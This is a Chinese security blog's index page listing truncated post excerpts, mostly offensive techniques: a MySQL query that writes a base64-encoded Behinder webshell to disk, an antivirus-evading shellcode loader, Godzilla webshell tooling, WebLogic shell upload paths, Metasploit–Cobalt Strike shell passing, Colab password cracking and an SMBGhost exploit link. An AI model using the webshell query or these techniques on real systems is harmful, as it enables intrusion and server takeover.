工具盒子

经验分享

伊朗解除对 WhatsApp 和 Google Play 的封禁

2024-12-29 厉飞雨阅读(118) 评论(0) 赞(6)

伊朗官媒称，当局解除了对 WhatsApp 和 Google Play 的封禁。伊朗是对互联网访问限制最严格的国家之一，而网民通常会利用 VPN 绕过封锁访问流行社交媒体如 Facebook、Twitter 和 YouTube。官媒援引信息和通信技术部部长 Sattar Hashemi 的话称，此举是移除互联网限制的第一步。 <br /> <br />...

开发笔记

vscode的变成idea的主题

2024-12-29 厉飞雨阅读(247) 评论(0) 赞(5)

用惯了jb全家桶，别的都用不习惯。但是又不得不用某些ide，比如vscode，自带的主题和配置实在难顶。网上找了主题和图标，配合起来还算能接受，简单记录一下。主题图标 ==== 为了把vscode变成jetbrains的idea只能这样做了。主题使用**Darcula** ，图标使用**JetBrains Icon Theme**。两个都能直接在拓展里面搜到。简单...

软件教程

mysql写冰蝎马

2024-12-29 厉飞雨阅读(116) 评论(0) 赞(6)

select '<?php file_put_contents("abab.php",base64_decode("Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCS...

开发笔记

新鲜出炉免杀ShellcodeLoader

2024-12-29 厉飞雨阅读(141) 评论(0) 赞(5)

使用效果在动态加载方式勾选反沙箱之后，结果如下： ![](https://mmbiz.qpic.cn/sz_mmbiz_png/4PzD69su9gVHDwuoQnna9aw1pjmYaR5miaGKrFPsBzwdSAuV5XTr56yTPQvN5dMutIzYvEeVQHpdhQ5QH8icQDKQ/640?wx_fmt=png&tp=webp&wxf...

经验分享

渗透利用mysql总结

2024-12-29 厉飞雨阅读(128) 评论(0) 赞(6)

前言 === 今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止，不会讲的太细。一、sqlshell获取 ============ 要利用mysql首先得拿到一个可以执行sql的mysql才能利用，下面就说一下几种常见姿势，欢迎补充。 1、弱口令这个比较简单，网上工具很多如美杜莎，九头蛇这些比较知名的，msf也有相应的模块。我自己之前也写过一个。要是运气...

日常运维

白嫖Google Colab免费资源来跑密码它不香？

2024-12-29 厉飞雨阅读(163) 评论(0) 赞(5)

一.前言 ==== 直接学了一段时间的机器学习，接触到了google的在线免费的 Jupyter,关键是还支持gpu真tm香,于是乎就有了这篇文章。二.Colab简介 ========= 直接看官方的介绍简单的说就是给你分一台40GB硬盘+2\*2.30GHZ CPU+12.72GB内存的服务器，你就说香不香。三.Colab使用 ========= **1、执...

开发笔记

哥斯拉Godzilla shell管理工具

2024-12-29 厉飞雨阅读(144) 评论(0) 赞(5)

前言 === 今年hw有点牛批，昨天爆出一堆0day，冰蝎也出了3.0，今天又看到一个哥斯拉，听说比冰蝎还nb(安全性自测，会不会是蓝队放出来的0_0) 哥斯拉优点 ===== * 1哥斯拉全部类型的shell均过市面所有静态查杀(特征随便改改就能继续过) * 2哥斯拉流量加密过市面全部流量waf * 3哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的(看了一下确实香) 项...

软件教程

记weblogic上传shell路径

2024-12-29 厉飞雨阅读(157) 评论(0) 赞(6)

前言 === weblogic最近又出境了，小记一波。路径 === 1、image目录 c:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp shell访问 http://xxxx/con...

白嫖帮

metasploit与Cobaltstrike互相派生转化shell

2024-12-29 厉飞雨阅读(126) 评论(0) 赞(7)

前言 === 一般大家都是两款神器结合使用，自然少不了shell之间转换。 msf转cs ====== 首先cs创建一个windows/becon_http/reverse_http的 Listener 再用msf弹shell过去 msf exploit(handler) > use exploit/windows/local/payload_i...

操作系统

CVE-2020-0796微软SMBv3永恒之黑漏洞复现

2024-12-29 厉飞雨阅读(106) 评论(0) 赞(7)

前言 === 多的不用说，又是一个内网大杀器。win10用户真香。具体视频，我会在头条号(safe6安全)发布。工具下载 ==== 奇安信的检测工具 http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip EXP下载地址 https://github.com/chompie1337/SMBGhost_R...